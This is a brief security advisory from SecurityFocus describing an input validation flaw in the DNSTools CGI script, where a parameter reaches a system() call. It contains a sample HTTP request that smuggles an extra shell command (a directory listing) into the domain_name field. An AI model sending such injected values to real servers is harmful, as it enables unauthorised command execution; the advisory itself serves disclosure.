DNSTools Input Validation Vulnerability

The key to this exploit is causing the system() call to execute commands other than the intended one. The following would cause a directory listing: GET /~jed/cgi-bin/test.pl?domain_name=\"\;ls\" HTTP/1.0


 

Privacy Statement
Copyright 2010, SecurityFocus